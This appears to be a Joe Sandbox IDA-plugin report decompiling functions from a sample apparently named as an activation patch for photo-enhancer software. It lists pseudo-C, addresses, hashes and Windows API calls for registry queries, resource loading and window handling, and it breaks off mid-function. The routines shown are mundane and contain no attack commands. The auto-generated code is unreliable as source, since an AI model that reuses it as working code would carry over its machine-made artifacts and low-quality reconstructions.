Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Windows\CurrentVersion
API String ID: 47109696-1019749484
Opcode ID: ca07cc273c2b46f61372ca569078a001357472d08ce3e20ae14c980e0cb804ec
Instruction ID: a9f283cd3a80185a7eeae6af9f057f4917a41fcfe10abca868fc5e90a7391123
Opcode Fuzzy Hash: ca07cc273c2b46f61372ca569078a001357472d08ce3e20ae14c980e0cb804ec
Instruction Fuzzy Hash: 7CF082357042146BDA04A65F5C42BAEA79D8B88758F2041BBF908DB342DAB99E0203AD

Uniqueness

Uniqueness Score: -1.00%

Function 0042E2AC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042E2AC(void* __eax, char* __ecx, void* __edx, void** _a4, int _a8, int _a12) {
				long _t7;
				char* _t8;
				void* _t9;
				int _t10;

				_t9 = __edx;
				_t8 = __ecx;
				_t10 = _a8;
				if(__eax == 2) {
					_t10 = _t10 | 0x00000100;
				}
				_t7 = RegOpenKeyExA(_t9, _t8, _a12, _t10, _a4); // executed
				return _t7;
			}

0x0042e2ac
0x0042e2ac
0x0042e2b0
0x0042e2b5
0x0042e2b7
0x0042e2b7
0x0042e2c8
0x0042e2cf

APIs

RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00485FB3,?,00000001,?,?,00485FB3,?,00000001,00000000), ref: 0042E2C8

Strings

System\CurrentControlSet\Control\Windows, xrefs: 0042E2C6

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Open
String ID: System\CurrentControlSet\Control\Windows
API String ID: 71445658-1109719901
Opcode ID: ed255555a649cb1171c21319c526f46fc311307b4f4854cf2574364da4ece07e
Instruction ID: 56e59db3f123c5f73e455ef79faaa31902e81261c81f50e50b595f428ef93046
Opcode Fuzzy Hash: ed255555a649cb1171c21319c526f46fc311307b4f4854cf2574364da4ece07e
Instruction Fuzzy Hash: 6FD0C772510128BBD701DA89DC41EFB775DDB15760F40401BFD1497141C2B4EC5197F4

Uniqueness

Uniqueness Score: -1.00%

Function 004806B8 Relevance: 3.2, APIs: 2, Instructions: 160
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004806B8(long __eax, void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t26;
				intOrPtr _t27;
				void* _t32;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr _t55;
				intOrPtr _t59;
				intOrPtr _t63;
				struct HWND__* _t65;
				int _t66;
				intOrPtr _t67;
				void* _t70;
				void* _t72;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t98;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t112;
				void* _t120;
				void* _t123;
				void* _t124;
				void* _t126;
				void* _t127;
				void* _t129;
				void* _t130;
				long _t131;
				void* _t134;

				_t94 = __ecx;
				_t26 = __eax;
				_t131 = __eax;
				_t134 = _t131 -  *0x49cc90; // 0x0
				if(_t134 == 0) {
					L28:
					return _t26;
				} else {
					_t27 =  *0x49f368; // 0x2252aac
					_t92 = E0040B6DC(_t27, __eax);
					_push(E00403574( *((intOrPtr*)(_t92 + 0x18))));
					_t2 = _t92 + 0x18; // 0x18
					_t32 = E00403744(_t2);
					_pop(_t98);
					E00451CD8(_t32, _t94, _t98);
					 *0x49cc90 = _t131;
					E00403AC0(0x49f324, _t92, 0x4316ec, _t120, 0x49f324);
					_t126 = _t92;
					memcpy(0x49f324, _t126, 0x10 << 2);
					_t123 = _t126 + 0x20;
					asm("movsb");
					_t4 = _t123 - 0x41; // 0x49f2e3
					_t127 = 0x49f324;
					E00403ACC(_t4, 0x4316ec);
					if( *((intOrPtr*)(_t127 + 0x28)) == 0x411 && GetACP() == 0x3a4 &&  *0x49f458 < 0x5010000 && E0042E7AC(0x480910, _t92) != 0) {
						_t6 = _t127 + 0x10; // 0x49f334
						E00403450(_t6, _t92, 0x480910, _t123, _t127);
						 *((intOrPtr*)(_t127 + 0x38)) = 0xc;
						if( *0x49f458 < 0x5000000) {
							_t8 = _t127 + 8; // 0x49f32c
							E00403450(_t8, _t92, 0x480910, _t123, _t127);
							 *((intOrPtr*)(_t127 + 0x30)) = 9;
							_t10 = _t127 + 0xc; // 0x49f330
							E00403450(_t10, _t92, 0x480910, _t123, _t127);
							 *((intOrPtr*)(_t127 + 0x34)) = 0x1d;
							_t12 = _t127 + 0x14; // 0x49f338
							E00403450(_t12, _t92, 0x480910, _t123, _t127);
							 *((intOrPtr*)(_t127 + 0x3c)) = 9;
						}
					}
					if( *((intOrPtr*)(_t92 + 0x1c)) == 0) {
						_t101 =  *0x49f254; // 0x2268d04
						E00403450(0x49f3b4, _t92, _t101, _t123, _t127);
					} else {
						E00403450(0x49f3b4, _t92,  *((intOrPtr*)(_t92 + 0x1c)), _t123, _t127);
					}
					if( *((intOrPtr*)(_t92 + 0x20)) == 0) {
						_t102 =  *0x49f258; // 0x2268f08
						E00403450(0x49f3b8, _t92, _t102, _t123, _t127);
					} else {
						E00403450(0x49f3b8, _t92,  *((intOrPtr*)(_t92 + 0x20)), _t123, _t127);
					}
					_t142 =  *((intOrPtr*)(_t92 + 0x24));
					if( *((intOrPtr*)(_t92 + 0x24)) == 0) {
						_t103 =  *0x49f25c; // 0x2269170
						E00403450(0x49f3bc, _t92, _t103, _t123, _t127);
					} else {
						E00403450(0x49f3bc, _t92,  *((intOrPtr*)(_t92 + 0x24)), _t123, _t127);
					}
					_t20 = _t127 + 0x40; // 0x0
					E0042F5EC( *_t20);
					_t47 =  *0x49edd8; // 0x230cb88
					E0042F5B4(0, 0, E00403738(_t47), _t142);
					_t51 =  *0x49ecec; // 0x230ba68
					E0042F5B4(1, 0, E00403738(_t51), _t142);
					_t55 =  *0x49ed80; // 0x230c388
					E0042F5B4(2, 0, E00403738(_t55), _t142);
					_t59 =  *0x49ed80; // 0x230c388
					E0042F5B4(3, 0, E00403738(_t59), _t142);
					_t108 =  *0x49eec8; // 0x230dd30
					_t63 =  *0x49e62c; // 0x2252410
					E00424754(_t63, _t108, _t123);
					_t26 =  *0x49f374; // 0x2252ae8
					_t129 =  *((intOrPtr*)(_t26 + 8)) - 1;
					if(_t129 < 0) {
						L26:
						if( *0x49f108 == 0) {
							goto L28;
						}
						_t65 =  *0x49f10c; // 0x303b2
						_t66 = SendNotifyMessageA(_t65, 0x496, 0x2711, _t131); // executed
						return _t66;
					} else {
						_t130 = _t129 + 1;
						_t124 = 0;
						do {
							_t67 =  *0x49f374; // 0x2252ae8
							_t93 = E0040B6DC(_t67, _t124);
							_t70 =  *((intOrPtr*)(_t93 + 0x25)) - 1;
							if(_t70 == 0) {
								_t23 = _t93 + 4; // 0x4
								_t110 =  *0x49edbc; // 0x230c9c4
								_t26 = E00403450(_t23, _t93, _t110, _t124, _t130);
							} else {
								_t72 = _t70 - 1;
								if(_t72 == 0) {
									_t24 = _t93 + 4; // 0x4
									_t111 =  *0x49ecd4; // 0x230b854
									_t26 = E00403450(_t24, _t93, _t111, _t124, _t130);
								} else {
									_t26 = _t72 - 1;
									if(_t26 == 0) {
										_t25 = _t93 + 4; // 0x4
										_t112 =  *0x49ecf4; // 0x230bad4
										_t26 = E00403450(_t25, _t93, _t112, _t124, _t130);
									}
								}
							}
							_t124 = _t124 + 1;
							_t130 = _t130 - 1;
						} while (_t130 != 0);
						goto L26;
					}
				}
			}

0x004806b8
0x004806b8
0x004806bc
0x004806c3
0x004806c9
0x00480907
0x00480907
0x004806cf
0x004806d1
0x004806db
0x004806e5
0x004806e6
0x004806e9
0x004806ee
0x004806ef
0x004806f4
0x00480701
0x00480709
0x00480710
0x00480710
0x00480712
0x00480713
0x00480716
0x0048071c
0x00480728
0x00480754
0x0048075c
0x00480761
0x00480772
0x00480774
0x0048077c
0x00480781
0x00480788
0x00480790
0x00480795
0x0048079c
0x004807a4
0x004807a9
0x004807a9
0x00480772
0x004807b4
0x004807ca
0x004807d0
0x004807b6
0x004807be
0x004807be
0x004807d9
0x004807ef
0x004807f5
0x004807db
0x004807e3
0x004807e3
0x004807fa
0x004807fe
0x00480814
0x0048081a
0x00480800
0x00480808
0x00480808
0x0048081f
0x00480822
0x00480827
0x00480835
0x0048083a
0x00480848
0x0048084d
0x0048085b
0x00480860
0x0048086e
0x00480873
0x00480879
0x0048087e
0x00480883
0x0048088b
0x0048088e
0x004808e4
0x004808eb
0x00000000
0x00000000
0x004808f8
0x004808fe
0x00000000
0x00480890
0x00480890
0x00480891
0x00480893
0x00480895
0x0048089f
0x004808a4
0x004808a6
0x004808b2
0x004808b5
0x004808bb
0x004808a8
0x004808a8
0x004808aa
0x004808c2
0x004808c5
0x004808cb
0x004808ac
0x004808ac
0x004808ae
0x004808d2
0x004808d5
0x004808db
0x004808db
0x004808ae
0x004808aa
0x004808e0
0x004808e1
0x004808e1
0x00000000
0x00480893
0x0048088e

APIs

GetACP.KERNEL32(?,?,00000001,00000000,00480997,?,-0000001A,0048289A,-00000010,?,00000004,0000001C,00000000,00482C37,?,0045E3F8), ref: 0048072E

Part of subcall function 0042E7AC: GetDC.USER32(00000000), ref: 0042E7BB
Part of subcall function 0042E7AC: EnumFontsA.GDI32(?,00000000,0042E798,00000000,00000000,0042E804,?,00000000,00000000,?,00000001,00000000,00000002,00000000,0048361D), ref: 0042E7E6
Part of subcall function 0042E7AC: ReleaseDC.USER32 ref: 0042E7FE

SendNotifyMessageA.USER32(000303B2,00000496,00002711,-00000001), ref: 004808FE

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: EnumFontsMessageNotifyReleaseSend
String ID:
API String ID: 2649214853-0
Opcode ID: 1709ff10a59be4cecabd083e4b30542a8388fbd88fe320f99732743ee2b207fe
Instruction ID: d9213170d9bb76dc80c92ed06a2bbf1e51aab055aabe148a8f981411f3335874
Opcode Fuzzy Hash: 1709ff10a59be4cecabd083e4b30542a8388fbd88fe320f99732743ee2b207fe
Instruction Fuzzy Hash: 925185746101049BDB50FF26D88165E77A9BB54309B50893BE8049B367CB3CED4ECB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0042E090 Relevance: 3.1, APIs: 2, Instructions: 113
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0042E090(void* __eax, void* __ebx, intOrPtr __ecx, char* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				char _v24;
				long _t44;
				signed int _t56;
				char _t64;
				intOrPtr _t80;
				void* _t85;
				signed int _t89;
				signed int _t90;
				void* _t93;

				_v24 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t85 = __eax;
				_push(_t93);
				_push(0x42e1c8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t93 + 0xffffffec;
				while(1) {
					_v20 = 0;
					_t44 = RegQueryValueExA(_t85, _v8, 0,  &_v16, 0,  &_v20); // executed
					if(_t44 != 0 || _v16 != _a8 && _v16 != _a4) {
						break;
					}
					if(_v20 != 0) {
						__eflags = _v20 - 0x70000000;
						if(_v20 >= 0x70000000) {
							E00409090();
						}
						_t87 = _v20;
						__eflags = _v20;
						E004034E0( &_v24, _t87 >> 0, 0, _v20);
						_t56 = RegQueryValueExA(_t85, _v8, 0,  &_v16, E00403744( &_v24),  &_v20); // executed
						__eflags = _t56 - 0xea;
						if(_t56 == 0xea) {
							continue;
						} else {
							__eflags = _t56;
							if(_t56 != 0) {
								break;
							}
							__eflags = _v16 - _a8;
							if(_v16 == _a8) {
								L12:
								_t89 = _v20;
								__eflags = _t89;
								_t90 = _t89 >> 0;
								while(1) {
									__eflags = _t90;
									if(_t90 == 0) {
										break;
									}
									_t64 = _v24;
									__eflags =  *((char*)(_t64 + _t90 - 1));
									if( *((char*)(_t64 + _t90 - 1)) == 0) {
										_t90 = _t90 - 1;
										__eflags = _t90;
										continue;
									}
									break;
								}
								__eflags = _v16 - 7;
								if(_v16 == 7) {
									__eflags = _t90;
									if(_t90 != 0) {
										_t90 = _t90 + 1;
										__eflags = _t90;
									}
								}
								E004038A4( &_v24, _t90);
								__eflags = _v16 - 7;
								if(_v16 == 7) {
									__eflags = _t90;
									if(_t90 != 0) {
										(E00403744( &_v24))[_t90 - 1] = 0;
									}
								}
								E00403450(_v12, 0, _v24, _t85, _t90);
								break;
							}
							__eflags = _v16 - _a4;
							if(_v16 != _a4) {
								break;
							}
							goto L12;
						}
					} else {
						E00403400(_v12);
						break;
					}
				}
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(E0042E1CF);
				return E00403400( &_v24);
			}

0x0042e09b
0x0042e09e
0x0042e0a1
0x0042e0a4
0x0042e0a8
0x0042e0a9
0x0042e0ae
0x0042e0b1
0x0042e0b6
0x0042e0b8
0x0042e0cc
0x0042e0d3
0x00000000
0x00000000
0x0042e0f1
0x0042e102
0x0042e109
0x0042e10b
0x0042e10b
0x0042e110
0x0042e113
0x0042e11f
0x0042e13c
0x0042e141
0x0042e146
0x00000000
0x0042e14c
0x0042e14c
0x0042e14e
0x00000000
0x00000000
0x0042e153
0x0042e156
0x0042e160
0x0042e160
0x0042e163
0x0042e165
0x0042e16b
0x0042e16b
0x0042e16d
0x00000000
0x00000000
0x0042e16f
0x0042e172
0x0042e177
0x0042e16a
0x0042e16a
0x00000000
0x0042e16a
0x00000000
0x0042e177
0x0042e179
0x0042e17d
0x0042e17f
0x0042e181
0x0042e183
0x0042e183
0x0042e183
0x0042e181
0x0042e189
0x0042e18e
0x0042e192
0x0042e194
0x0042e196
0x0042e1a0
0x0042e1a0
0x0042e196
0x0042e1ab
0x00000000
0x0042e1b0
0x0042e15b
0x0042e15e
0x00000000
0x00000000
0x00000000
0x0042e15e
0x0042e0f3
0x0042e0f6
0x00000000
0x0042e0fb
0x0042e0f1
0x0042e1b4
0x0042e1b7
0x0042e1ba
0x0042e1c7

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042E1C8), ref: 0042E0CC
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042E1C8), ref: 0042E13C

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 84705cc745a76f35316d583d44dda58a4a0f4931e2014e09282529c66a3fa9aa
Instruction ID: ac779da0cea268326c2a6d460357836690a2c7bc48c0bb75f71a4d6dd427c8e5
Opcode Fuzzy Hash: 84705cc745a76f35316d583d44dda58a4a0f4931e2014e09282529c66a3fa9aa
Instruction Fuzzy Hash: F6415D71E00129ABDB11DE92D881BBFB7B9AB00704F94447AE804F7281D738AE44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B268 Relevance: 3.1, APIs: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040B268(void* __eax, intOrPtr* __edx, void* __edi) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				signed int _t10;
				signed int _t11;
				intOrPtr _t17;
				intOrPtr* _t22;
				struct HINSTANCE__* _t26;
				void* _t30;
				intOrPtr _t33;
				void* _t36;
				intOrPtr _t39;
				intOrPtr _t41;

				_t39 = _t41;
				_t22 = __edx;
				_t36 = __eax;
				_t8 = E00403738(__eax);
				_t9 =  *0x49e014; // 0x400000
				_t10 = FindResourceA(_t9, _t8, 0xa);
				_t30 = _t10;
				_t11 = _t10 & 0xffffff00 | _t30 != 0x00000000;
				_t43 = _t11;
				if(_t11 == 0) {
					return _t11;
				} else {
					FreeResource(_t30);
					_t26 =  *0x49e014; // 0x400000
					_v8 = E0040D3DC(_t26, 1, 0xa, _t36);
					_push(_t39);
					_push(0x40b2e0);
					_push( *[fs:eax]);
					 *[fs:eax] = _t41;
					_t17 = E0040D034(_v8, _t22,  *_t22, __edi, _t36, _t43); // executed
					 *_t22 = _t17;
					_pop(_t33);
					 *[fs:eax] = _t33;
					_push(E0040B2E7);
					return E00402B58(_v8);
				}
			}

0x0040b269
0x0040b26e
0x0040b270
0x0040b276
0x0040b27c
0x0040b282
0x0040b287
0x0040b28b
0x0040b28e
0x0040b290
0x0040b2ed
0x0040b292
0x0040b293
0x0040b29b
0x0040b2ad
0x0040b2b2
0x0040b2b3
0x0040b2b8
0x0040b2bb
0x0040b2c3
0x0040b2c8
0x0040b2cc
0x0040b2cf
0x0040b2d2
0x0040b2df
0x0040b2df

APIs

FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040B282
FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B3DF,00000000,0040B3F7,?,?,?,00000000), ref: 0040B293

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Resource$FindFree
String ID:
API String ID: 4097029671-0
Opcode ID: f44a595471e3641da7e117af8a411af3c87394e349778b428f090f3362ac6d02
Instruction ID: 695c6acfda2bd8b41d5000065fdd751145cb6e9c132907bad199632a3a3e20ef
Opcode Fuzzy Hash: f44a595471e3641da7e117af8a411af3c87394e349778b428f090f3362ac6d02
Instruction Fuzzy Hash: 9701F7717003046FD700EF66DC52D1A77ADDB49758711807BF500EB2D0D6799C01D66D

Uniqueness

Uniqueness Score: -1.00%

Function 0041F334 Relevance: 3.0, APIs: 2, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041F334(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				void* _t31;
				void* _t32;
				intOrPtr _t33;

				_t31 = _t32;
				_t33 = _t32 + 0xfffffff4;
				_v8 = 0;
				_t24 =  *0x49c580; // 0x0
				_v12 = _t24;
				_t25 =  *0x49c58c; // 0x0
				_v16 = _t25;
				 *0x49c580 = __eax;
				 *0x49c58c = 0;
				_push(_t31);
				_push(0x41f3d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t33;
				_push(_t31);
				_push( *[fs:eax]);
				 *[fs:eax] = _t33;
				EnumThreadWindows(GetCurrentThreadId(), E0041F2E4, 0);
				_t13 =  *0x49c58c; // 0x0
				_v8 = _t13;
				_pop(_t26);
				 *[fs:eax] = _t26;
				_t27 = 0x41f3a0;
				 *[fs:eax] = _t27;
				_push(E0041F3DE);
				 *0x49c58c = _v16;
				_t17 = _v12;
				 *0x49c580 = _t17;
				return _t17;
			}

0x0041f335
0x0041f337
0x0041f33f
0x0041f342
0x0041f348
0x0041f34b
0x0041f351
0x0041f354
0x0041f35b
0x0041f362
0x0041f363
0x0041f368
0x0041f36b
0x0041f370
0x0041f376
0x0041f379
0x0041f389
0x0041f38e
0x0041f393
0x0041f398
0x0041f39b
0x0041f3bb
0x0041f3be
0x0041f3c1
0x0041f3c9
0x0041f3ce
0x0041f3d1
0x0041f3d6

APIs

GetCurrentThreadId.KERNEL32 ref: 0041F383
EnumThreadWindows.USER32(00000000,0041F2E4,00000000), ref: 0041F389

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Thread$CurrentEnumWindows
String ID:
API String ID: 2396873506-0
Opcode ID: 8784a61061ea2f72866c7836b43b9cd2818a747c771340166bb5f43570082ce4
Instruction ID: 69490fc5d8632824c24a89202964c68dfb33a06c8812e8dd8cc51cc2245d12bd
Opcode Fuzzy Hash: 8784a61061ea2f72866c7836b43b9cd2818a747c771340166bb5f43570082ce4
Instruction Fuzzy Hash: E7016D75A04608BFD701CF76EC5195ABBF8E789720B62C877E804D3790E7386811DE18

Uniqueness

Uniqueness Score: -1.00%

Function 004236CC Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004236CC(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x38)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffec;
				_t12 = 0x49c5e4;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						_t11 = 0;
					} else {
						_t11 =  *0x49e014; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E004237C0(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}

0x004236d0
0x004236de
0x004236e1
0x004236e6
0x004236eb
0x004236ee
0x004236fd
0x004236f5
0x004236f5
0x004236f5
0x00423703
0x0042370e
0x00423713
0x00423714
0x00423717
0x00423720

APIs

LoadCursorA.USER32 ref: 004236D9
LoadCursorA.USER32 ref: 00423703

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CursorLoad
String ID:
API String ID: 3238433803-0
Opcode ID: 435632a159b4ee3f4de27f3f53cb37f8d356402f2aecc44b66926b1db8d28f8a
Instruction ID: 38849c99451a314d8fe435546c8a0ff0f6ed66ecc1deebef06b1f4ec46e3768a
Opcode Fuzzy Hash: 435632a159b4ee3f4de27f3f53cb37f8d356402f2aecc44b66926b1db8d28f8a
Instruction Fuzzy Hash: 5FF0A7617041206BD620593E6CC1D2A76AC8B81B35F61033BFA2BD73D1C66E6D41416D

Uniqueness

Uniqueness Score: -1.00%

Function 0042E824 Relevance: 3.0, APIs: 2, Instructions: 33
libraryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0042E824(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x42e896);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x42e878);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryA(E00403738(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(E0042E87F);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}

0x0042e825
0x0042e827
0x0042e82b
0x0042e82e
0x0042e833
0x0042e838
0x0042e839
0x0042e83e
0x0042e841
0x0042e844
0x0042e849
0x0042e84a
0x0042e84f
0x0042e852
0x0042e85d
0x0042e862
0x0042e867
0x0042e86a
0x0042e86d
0x0042e872
0x0042e874
0x0042e877

APIs

SetErrorMode.KERNEL32(00008000), ref: 0042E82E
LoadLibraryA.KERNEL32(00000000,00000000,0042E878,?,00000000,0042E896,?,00008000), ref: 0042E85D

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 52fc65cf806279aaad662d3b1e3333b45c46a16ca84e47e60ba8f8dfd3806aa9
Instruction ID: d8a4edba93e6b3564287fdd291ee362a4641d771db482aeeea55453c97403edd
Opcode Fuzzy Hash: 52fc65cf806279aaad662d3b1e3333b45c46a16ca84e47e60ba8f8dfd3806aa9
Instruction Fuzzy Hash: 49F08270B14744BEDB116F779C6282BBBECE749B1079249B6F800A3691E63C88108928

Uniqueness

Uniqueness Score: -1.00%

Function 00478D78 Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00478D78(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t5;
				_Unknown_base(*)()* _t6;
				long _t7;
				_Unknown_base(*)()* _t8;
				long _t9;
				void* _t11;
				int _t14;
				struct HWND__* _t15;
				long _t16;

				_t16 = _a16;
				_t14 = _a12;
				_t5 = _a8;
				_t15 = _a4;
				_t11 = _t5 - 0x143;
				if(_t11 == 0 || _t11 + 0xfffffffb - 2 < 0) {
					_t6 =  *0x49f0dc; // 0x6fb36c40
					_t7 = CallWindowProcW(_t6, _t15, _t5, _t14, _t16); // executed
					return _t7;
				} else {
					_t8 =  *0x49f0e0; // 0xffff0375
					_t9 = CallWindowProcW(_t8, _t15, _t5, _t14, _t16); // executed
					return _t9;
